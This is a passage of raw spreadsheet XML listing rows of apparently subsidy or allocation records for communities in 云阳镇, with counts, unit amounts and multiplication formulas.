      <c r="C1578" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1578" s="17" t="s">
        <v>4242</v>
      </c>
      <c r="E1578" s="17" t="s">
        <v>425</v>
      </c>
      <c r="F1578" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1578" s="17">
        <v>2</v>
      </c>
      <c r="H1578" s="18">
        <v>325</v>
      </c>
      <c r="I1578" s="17">
        <f t="shared" si="83"/>
        <v>650</v>
      </c>
      <c r="J1578" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1578" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1579" customHeight="1" spans="1:11">
      <c r="A1579" s="16" t="s">
        <v>4243</v>
      </c>
      <c r="B1579" s="17" t="str">
        <f>B1578</f>
        <v>云阳镇</v>
      </c>
      <c r="C1579" s="17" t="str">
        <f>C1578</f>
        <v>南召店</v>
      </c>
      <c r="D1579" s="16" t="s">
        <v>4244</v>
      </c>
      <c r="E1579" s="16" t="s">
        <v>4245</v>
      </c>
      <c r="F1579" s="17" t="str">
        <f>F1578</f>
        <v>4113210519</v>
      </c>
      <c r="G1579" s="17"/>
      <c r="H1579" s="17"/>
      <c r="I1579" s="17"/>
      <c r="J1579" s="17"/>
      <c r="K1579" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1580" customHeight="1" spans="1:11">
      <c r="A1580" s="16" t="s">
        <v>4246</v>
      </c>
      <c r="B1580" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1580" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1580" s="17" t="s">
        <v>4247</v>
      </c>
      <c r="E1580" s="17" t="s">
        <v>4248</v>
      </c>
      <c r="F1580" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1580" s="17">
        <v>1</v>
      </c>
      <c r="H1580" s="18">
        <v>365</v>
      </c>
      <c r="I1580" s="17">
        <f t="shared" ref="I1580:I1585" si="84">H1580*G1580</f>
        <v>365</v>
      </c>
      <c r="J1580" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1580" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1581" customHeight="1" spans="1:11">
      <c r="A1581" s="16" t="s">
        <v>4249</v>
      </c>
      <c r="B1581" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1581" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1581" s="17" t="s">
        <v>4250</v>
      </c>
      <c r="E1581" s="17" t="s">
        <v>4251</v>
      </c>
      <c r="F1581" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1581" s="17">
        <v>1</v>
      </c>
      <c r="H1581" s="18">
        <v>365</v>
      </c>
      <c r="I1581" s="17">
        <f t="shared" si="84"/>
        <v>365</v>
      </c>
      <c r="J1581" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1581" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1582" customHeight="1" spans="1:11">
      <c r="A1582" s="16" t="s">
        <v>4252</v>
      </c>
      <c r="B1582" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1582" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1582" s="17" t="s">
        <v>4253</v>
      </c>
      <c r="E1582" s="17" t="s">
        <v>3822</v>
      </c>
      <c r="F1582" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1582" s="17">
        <v>1</v>
      </c>
      <c r="H1582" s="18">
        <v>365</v>
      </c>
      <c r="I1582" s="17">
        <f t="shared" si="84"/>
        <v>365</v>
      </c>
      <c r="J1582" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1582" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1583" customHeight="1" spans="1:11">
      <c r="A1583" s="16" t="s">
        <v>4254</v>
      </c>
      <c r="B1583" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1583" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1583" s="17" t="s">
        <v>4255</v>
      </c>
      <c r="E1583" s="17" t="s">
        <v>4256</v>
      </c>
      <c r="F1583" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1583" s="17">
        <v>1</v>
      </c>
      <c r="H1583" s="18">
        <v>365</v>
      </c>
      <c r="I1583" s="17">
        <f t="shared" si="84"/>
        <v>365</v>
      </c>
      <c r="J1583" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1583" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1584" customHeight="1" spans="1:11">
      <c r="A1584" s="16" t="s">
        <v>4257</v>
      </c>
      <c r="B1584" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1584" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1584" s="17" t="s">
        <v>4258</v>
      </c>
      <c r="E1584" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1584" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1584" s="17">
        <v>1</v>
      </c>
      <c r="H1584" s="18">
        <v>365</v>
      </c>
      <c r="I1584" s="17">
        <f t="shared" si="84"/>
        <v>365</v>
      </c>
      <c r="J1584" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1584" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1585" customHeight="1" spans="1:11">
      <c r="A1585" s="16" t="s">
        <v>4259</v>
      </c>
      <c r="B1585" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1585" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1585" s="17" t="s">
        <v>4260</v>
      </c>
      <c r="E1585" s="17" t="s">
        <v>3358</v>
      </c>
      <c r="F1585" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1585" s="17">
        <v>2</v>
      </c>
      <c r="H1585" s="18">
        <v>325</v>
      </c>
      <c r="I1585" s="17">
        <f t="shared" si="84"/>
        <v>650</v>
      </c>
      <c r="J1585" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1585" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1586" customHeight="1" spans="1:11">
      <c r="A1586" s="16" t="s">
        <v>4261</v>
      </c>
      <c r="B1586" s="17" t="str">
        <f>B1585</f>
        <v>云阳镇</v>
      </c>
      <c r="C1586" s="17" t="str">
        <f>C1585</f>
        <v>南召店</v>
      </c>
      <c r="D1586" s="16" t="s">
        <v>4262</v>
      </c>
      <c r="E1586" s="16" t="s">
        <v>4263</v>
      </c>
      <c r="F1586" s="17" t="str">
        <f>F1585</f>
        <v>4113210519</v>
      </c>
      <c r="G1586" s="17"/>
      <c r="H1586" s="17"/>
      <c r="I1586" s="17"/>
      <c r="J1586" s="17"/>
      <c r="K1586" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1587" customHeight="1" spans="1:11">
      <c r="A1587" s="16" t="s">
        <v>4264</v>
      </c>
      <c r="B1587" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1587" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1587" s="17" t="s">
        <v>2951</v>
      </c>
      <c r="E1587" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1587" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1587" s="17">
        <v>1</v>
      </c>
      <c r="H1587" s="18">
        <v>365</v>
      </c>
      <c r="I1587" s="17">
        <f>H1587*G1587</f>
        <v>365</v>
      </c>
      <c r="J1587" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1587" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1588" customHeight="1" spans="1:11">
      <c r="A1588" s="16" t="s">
        <v>4265</v>
      </c>
      <c r="B1588" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1588" s="17" t="s">
        <v>4224</v>
      </c>
      <c r="D1588" s="17" t="s">
        <v>4266</v>
      </c>
      <c r="E1588" s="17" t="s">
        <v>3787</v>
      </c>
      <c r="F1588" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1588" s="17">
        <v>1</v>
      </c>
      <c r="H1588" s="18">
        <v>365</v>
      </c>
      <c r="I1588" s="17">
        <f>H1588*G1588</f>
        <v>365</v>
      </c>
      <c r="J1588" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1588" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1589" customHeight="1" spans="1:11">
      <c r="A1589" s="16" t="s">
        <v>4267</v>
      </c>
      <c r="B1589" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1589" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1589" s="17" t="s">
        <v>4269</v>
      </c>
      <c r="E1589" s="17" t="s">
        <v>3661</v>
      </c>
      <c r="F1589" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1589" s="17">
        <v>2</v>
      </c>
      <c r="H1589" s="18">
        <v>325</v>
      </c>
      <c r="I1589" s="17">
        <f>H1589*G1589</f>
        <v>650</v>
      </c>
      <c r="J1589" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1589" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1590" customHeight="1" spans="1:11">
      <c r="A1590" s="16" t="s">
        <v>4270</v>
      </c>
      <c r="B1590" s="17" t="str">
        <f>B1589</f>
        <v>云阳镇</v>
      </c>
      <c r="C1590" s="17" t="str">
        <f>C1589</f>
        <v>小关社区</v>
      </c>
      <c r="D1590" s="17" t="s">
        <v>4271</v>
      </c>
      <c r="E1590" s="16" t="s">
        <v>3747</v>
      </c>
      <c r="F1590" s="17" t="str">
        <f>F1589</f>
        <v>4113210521</v>
      </c>
      <c r="G1590" s="17"/>
      <c r="H1590" s="17"/>
      <c r="I1590" s="17"/>
      <c r="J1590" s="17"/>
      <c r="K1590" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1591" customHeight="1" spans="1:11">
      <c r="A1591" s="16" t="s">
        <v>4272</v>
      </c>
      <c r="B1591" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1591" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1591" s="17" t="s">
        <v>4273</v>
      </c>
      <c r="E1591" s="17" t="s">
        <v>4274</v>
      </c>
      <c r="F1591" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1591" s="17">
        <v>1</v>
      </c>
      <c r="H1591" s="18">
        <v>365</v>
      </c>
      <c r="I1591" s="17">
        <f t="shared" ref="I1591:I1596" si="85">H1591*G1591</f>
        <v>365</v>
      </c>
      <c r="J1591" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1591" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1592" customHeight="1" spans="1:11">
      <c r="A1592" s="16" t="s">
        <v>4275</v>
      </c>
      <c r="B1592" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1592" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1592" s="17" t="s">
        <v>4276</v>
      </c>
      <c r="E1592" s="17" t="s">
        <v>3510</v>
      </c>
      <c r="F1592" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1592" s="17">
        <v>1</v>
      </c>
      <c r="H1592" s="18">
        <v>365</v>
      </c>
      <c r="I1592" s="17">
        <f t="shared" si="85"/>
        <v>365</v>
      </c>
      <c r="J1592" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1592" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1593" customHeight="1" spans="1:11">
      <c r="A1593" s="16" t="s">
        <v>4277</v>
      </c>
      <c r="B1593" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1593" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1593" s="17" t="s">
        <v>4278</v>
      </c>
      <c r="E1593" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1593" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1593" s="17">
        <v>1</v>
      </c>
      <c r="H1593" s="18">
        <v>365</v>
      </c>
      <c r="I1593" s="17">
        <f t="shared" si="85"/>
        <v>365</v>
      </c>
      <c r="J1593" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1593" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1594" customHeight="1" spans="1:11">
      <c r="A1594" s="16" t="s">
        <v>4279</v>
      </c>
      <c r="B1594" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1594" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1594" s="17" t="s">
        <v>4280</v>
      </c>
      <c r="E1594" s="17" t="s">
        <v>3682</v>
      </c>
      <c r="F1594" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1594" s="17">
        <v>1</v>
      </c>
      <c r="H1594" s="18">
        <v>365</v>
      </c>
      <c r="I1594" s="17">
        <f t="shared" si="85"/>
        <v>365</v>
      </c>
      <c r="J1594" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1594" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1595" customHeight="1" spans="1:11">
      <c r="A1595" s="16" t="s">
        <v>4281</v>
      </c>
      <c r="B1595" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1595" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1595" s="17" t="s">
        <v>4282</v>
      </c>
      <c r="E1595" s="17" t="s">
        <v>3779</v>
      </c>
      <c r="F1595" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1595" s="17">
        <v>1</v>
      </c>
      <c r="H1595" s="18">
        <v>365</v>
      </c>
      <c r="I1595" s="17">
        <f t="shared" si="85"/>
        <v>365</v>
      </c>
      <c r="J1595" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1595" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1596" customHeight="1" spans="1:11">
      <c r="A1596" s="16" t="s">
        <v>4283</v>
      </c>
      <c r="B1596" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1596" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1596" s="17" t="s">
        <v>4284</v>
      </c>
      <c r="E1596" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1596" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1596" s="17">
        <v>2</v>
      </c>
      <c r="H1596" s="18">
        <v>325</v>
      </c>
      <c r="I1596" s="17">
        <f t="shared" si="85"/>
        <v>650</v>
      </c>
      <c r="J1596" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1596" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1597" customHeight="1" spans="1:11">
      <c r="A1597" s="16" t="s">
        <v>4285</v>
      </c>
      <c r="B1597" s="17" t="str">
        <f>B1596</f>
        <v>云阳镇</v>
      </c>
      <c r="C1597" s="17" t="str">
        <f>C1596</f>
        <v>小关社区</v>
      </c>
      <c r="D1597" s="17" t="s">
        <v>4286</v>
      </c>
      <c r="E1597" s="24" t="s">
        <v>4287</v>
      </c>
      <c r="F1597" s="17" t="str">
        <f>F1596</f>
        <v>4113210521</v>
      </c>
      <c r="G1597" s="17"/>
      <c r="H1597" s="17"/>
      <c r="I1597" s="17"/>
      <c r="J1597" s="17"/>
      <c r="K1597" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1598" customHeight="1" spans="1:11">
      <c r="A1598" s="16" t="s">
        <v>4288</v>
      </c>
      <c r="B1598" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1598" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1598" s="17" t="s">
        <v>4289</v>
      </c>
      <c r="E1598" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1598" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1598" s="17">
        <v>1</v>
      </c>
      <c r="H1598" s="18">
        <v>365</v>
      </c>
      <c r="I1598" s="17">
        <f>H1598*G1598</f>
        <v>365</v>
      </c>
      <c r="J1598" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1598" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1599" customHeight="1" spans="1:11">
      <c r="A1599" s="16" t="s">
        <v>4290</v>
      </c>
      <c r="B1599" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1599" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1599" s="17" t="s">
        <v>4291</v>
      </c>
      <c r="E1599" s="17" t="s">
        <v>3889</v>
      </c>
      <c r="F1599" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1599" s="17">
        <v>2</v>
      </c>
      <c r="H1599" s="18">
        <v>325</v>
      </c>
      <c r="I1599" s="17">
        <f>H1599*G1599</f>
        <v>650</v>
      </c>
      <c r="J1599" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1599" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1600" customHeight="1" spans="1:11">
      <c r="A1600" s="16" t="s">
        <v>4292</v>
      </c>
      <c r="B1600" s="17" t="str">
        <f>B1599</f>
        <v>云阳镇</v>
      </c>
      <c r="C1600" s="17" t="str">
        <f>C1599</f>
        <v>小关社区</v>
      </c>
      <c r="D1600" s="48" t="s">
        <v>4293</v>
      </c>
      <c r="E1600" s="48" t="s">
        <v>4294</v>
      </c>
      <c r="F1600" s="17" t="str">
        <f>F1599</f>
        <v>4113210521</v>
      </c>
      <c r="G1600" s="17"/>
      <c r="H1600" s="17"/>
      <c r="I1600" s="17"/>
      <c r="J1600" s="17"/>
      <c r="K1600" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1601" customHeight="1" spans="1:11">
      <c r="A1601" s="16" t="s">
        <v>4295</v>
      </c>
      <c r="B1601" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1601" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1601" s="17" t="s">
        <v>4296</v>
      </c>
      <c r="E1601" s="17" t="s">
        <v>4136</v>
      </c>
      <c r="F1601" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1601" s="17">
        <v>3</v>
      </c>
      <c r="H1601" s="18">
        <v>290</v>
      </c>
      <c r="I1601" s="17">
        <f>H1601*G1601</f>
        <v>870</v>
      </c>
      <c r="J1601" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1601" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1602" customHeight="1" spans="1:11">
      <c r="A1602" s="16" t="s">
        <v>4297</v>
      </c>
      <c r="B1602" s="17" t="str">
        <f>B1601</f>
        <v>云阳镇</v>
      </c>
      <c r="C1602" s="17" t="str">
        <f>C1601</f>
        <v>小关社区</v>
      </c>
      <c r="D1602" s="32" t="s">
        <v>4298</v>
      </c>
      <c r="E1602" s="32" t="s">
        <v>4299</v>
      </c>
      <c r="F1602" s="17" t="str">
        <f>F1601</f>
        <v>4113210521</v>
      </c>
      <c r="G1602" s="17"/>
      <c r="H1602" s="17"/>
      <c r="I1602" s="17"/>
      <c r="J1602" s="17"/>
      <c r="K1602" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1603" customHeight="1" spans="1:11">
      <c r="A1603" s="16" t="s">
        <v>4300</v>
      </c>
      <c r="B1603" s="17" t="str">
        <f>B1602</f>
        <v>云阳镇</v>
      </c>
      <c r="C1603" s="17" t="str">
        <f>C1602</f>
        <v>小关社区</v>
      </c>
      <c r="D1603" s="32" t="s">
        <v>4301</v>
      </c>
      <c r="E1603" s="32" t="s">
        <v>2717</v>
      </c>
      <c r="F1603" s="17" t="str">
        <f>F1602</f>
        <v>4113210521</v>
      </c>
      <c r="G1603" s="17"/>
      <c r="H1603" s="17"/>
      <c r="I1603" s="17"/>
      <c r="J1603" s="17"/>
      <c r="K1603" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1604" customHeight="1" spans="1:11">
      <c r="A1604" s="16" t="s">
        <v>4302</v>
      </c>
      <c r="B1604" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1604" s="17" t="s">
        <v>4268</v>
      </c>
      <c r="D1604" s="17" t="s">
        <v>4303</v>
      </c>
      <c r="E1604" s="17" t="s">
        <v>425</v>
      </c>
      <c r="F1604" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1604" s="17">
        <v>1</v>
      </c>
      <c r="H1604" s="18">
        <v>365</v>
      </c>
      <c r="I1604" s="17">
        <f>H1604*G1604</f>
        <v>365</v>
      </c>
      <c r="J1604" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1604" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1605" customHeight="1" spans="1:11">
      <c r="A1605" s="16" t="s">
        <v>4304</v>
      </c>
      <c r="B1605" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1605" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1605" s="17" t="s">
        <v>4305</v>
      </c>
      <c r="E1605" s="17" t="s">
        <v>4306</v>
      </c>
      <c r="F1605" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1605" s="17">
        <v>2</v>
      </c>
      <c r="H1605" s="18">
        <v>325</v>
      </c>
      <c r="I1605" s="17">
        <f>H1605*G1605</f>
        <v>650</v>
      </c>
      <c r="J1605" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1605" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1606" customHeight="1" spans="1:11">
      <c r="A1606" s="16" t="s">
        <v>4307</v>
      </c>
      <c r="B1606" s="17" t="str">
        <f>B1605</f>
        <v>云阳镇</v>
      </c>
      <c r="C1606" s="17" t="str">
        <f>C1605</f>
        <v>大关居委会</v>
      </c>
      <c r="D1606" s="16" t="s">
        <v>4308</v>
      </c>
      <c r="E1606" s="16" t="s">
        <v>4309</v>
      </c>
      <c r="F1606" s="17" t="str">
        <f>F1605</f>
        <v>4113210522</v>
      </c>
      <c r="G1606" s="17"/>
      <c r="H1606" s="17"/>
      <c r="I1606" s="17"/>
      <c r="J1606" s="17"/>
      <c r="K1606" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1607" customHeight="1" spans="1:11">
      <c r="A1607" s="16" t="s">
        <v>4310</v>
      </c>
      <c r="B1607" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1607" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1607" s="17" t="s">
        <v>4311</v>
      </c>
      <c r="E1607" s="17" t="s">
        <v>4312</v>
      </c>
      <c r="F1607" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1607" s="17">
        <v>1</v>
      </c>
      <c r="H1607" s="18">
        <v>365</v>
      </c>
      <c r="I1607" s="17">
        <f t="shared" ref="I1607:I1615" si="86">H1607*G1607</f>
        <v>365</v>
      </c>
      <c r="J1607" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1607" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1608" customHeight="1" spans="1:11">
      <c r="A1608" s="16" t="s">
        <v>4313</v>
      </c>
      <c r="B1608" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1608" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1608" s="17" t="s">
        <v>4314</v>
      </c>
      <c r="E1608" s="17" t="s">
        <v>3621</v>
      </c>
      <c r="F1608" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1608" s="17">
        <v>1</v>
      </c>
      <c r="H1608" s="18">
        <v>365</v>
      </c>
      <c r="I1608" s="17">
        <f t="shared" si="86"/>
        <v>365</v>
      </c>
      <c r="J1608" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1608" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1609" customHeight="1" spans="1:11">
      <c r="A1609" s="16" t="s">
        <v>4315</v>
      </c>
      <c r="B1609" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1609" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1609" s="17" t="s">
        <v>4316</v>
      </c>
      <c r="E1609" s="17" t="s">
        <v>4317</v>
      </c>
      <c r="F1609" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1609" s="17">
        <v>1</v>
      </c>
      <c r="H1609" s="18">
        <v>365</v>
      </c>
      <c r="I1609" s="17">
        <f t="shared" si="86"/>
        <v>365</v>
      </c>
      <c r="J1609" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1609" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1610" customHeight="1" spans="1:11">
      <c r="A1610" s="16" t="s">
        <v>4318</v>
      </c>
      <c r="B1610" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1610" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1610" s="17" t="s">
        <v>4319</v>
      </c>
      <c r="E1610" s="17" t="s">
        <v>4159</v>
      </c>
      <c r="F1610" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1610" s="17">
        <v>1</v>
      </c>
      <c r="H1610" s="18">
        <v>365</v>
      </c>
      <c r="I1610" s="17">
        <f t="shared" si="86"/>
        <v>365</v>
      </c>
      <c r="J1610" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1610" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1611" customHeight="1" spans="1:11">
      <c r="A1611" s="16" t="s">
        <v>4320</v>
      </c>
      <c r="B1611" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1611" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1611" s="17" t="s">
        <v>4321</v>
      </c>
      <c r="E1611" s="17" t="s">
        <v>2259</v>
      </c>
      <c r="F1611" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1611" s="17">
        <v>1</v>
      </c>
      <c r="H1611" s="18">
        <v>365</v>
      </c>
      <c r="I1611" s="17">
        <f t="shared" si="86"/>
        <v>365</v>
      </c>
      <c r="J1611" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1611" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1612" customHeight="1" spans="1:11">
      <c r="A1612" s="16" t="s">
        <v>4322</v>
      </c>
      <c r="B1612" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1612" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1612" s="17" t="s">
        <v>4323</v>
      </c>
      <c r="E1612" s="17" t="s">
        <v>3682</v>
      </c>
      <c r="F1612" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1612" s="17">
        <v>1</v>
      </c>
      <c r="H1612" s="18">
        <v>365</v>
      </c>
      <c r="I1612" s="17">
        <f t="shared" si="86"/>
        <v>365</v>
      </c>
      <c r="J1612" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1612" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1613" customHeight="1" spans="1:11">
      <c r="A1613" s="16" t="s">
        <v>4324</v>
      </c>
      <c r="B1613" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1613" s="17" t="s">
        <v>4163</v>
      </c>
      <c r="D1613" s="17" t="s">
        <v>4325</v>
      </c>
      <c r="E1613" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F1613" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1613" s="17">
        <v>1</v>
      </c>
      <c r="H1613" s="18">
        <v>365</v>
      </c>
      <c r="I1613" s="17">
        <f t="shared" si="86"/>
        <v>365</v>
      </c>
      <c r="J1613" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1613" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1614" customHeight="1" spans="1:11">
      <c r="A1614" s="16" t="s">
        <v>4326</v>
      </c>
      <c r="B1614" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1614" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1614" s="17" t="s">
        <v>4328</v>
      </c>
      <c r="E1614" s="17" t="s">
        <v>3829</v>
      </c>
      <c r="F1614" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1614" s="17">
        <v>2</v>
      </c>
      <c r="H1614" s="18">
        <v>325</v>
      </c>
      <c r="I1614" s="17">
        <f t="shared" si="86"/>
        <v>650</v>
      </c>
      <c r="J1614" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1614" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1615" customHeight="1" spans="1:11">
      <c r="A1615" s="16" t="s">
        <v>4329</v>
      </c>
      <c r="B1615" s="17" t="str">
        <f>B1614</f>
        <v>云阳镇</v>
      </c>
      <c r="C1615" s="17" t="str">
        <f>C1614</f>
        <v>老城社区</v>
      </c>
      <c r="D1615" s="17" t="s">
        <v>4330</v>
      </c>
      <c r="E1615" s="16" t="s">
        <v>4331</v>
      </c>
      <c r="F1615" s="17" t="str">
        <f>F1614</f>
        <v>4113210523</v>
      </c>
      <c r="G1615" s="17"/>
      <c r="H1615" s="17"/>
      <c r="I1615" s="17"/>
      <c r="J1615" s="17"/>
      <c r="K1615" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1616" customHeight="1" spans="1:11">
      <c r="A1616" s="16" t="s">
        <v>4332</v>
      </c>
      <c r="B1616" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1616" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1616" s="17" t="s">
        <v>4333</v>
      </c>
      <c r="E1616" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F1616" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1616" s="17">
        <v>3</v>
      </c>
      <c r="H1616" s="18">
        <v>290</v>
      </c>
      <c r="I1616" s="17">
        <f>H1616*G1616</f>
        <v>870</v>
      </c>
      <c r="J1616" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1616" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1617" customHeight="1" spans="1:11">
      <c r="A1617" s="16" t="s">
        <v>4334</v>
      </c>
      <c r="B1617" s="17" t="str">
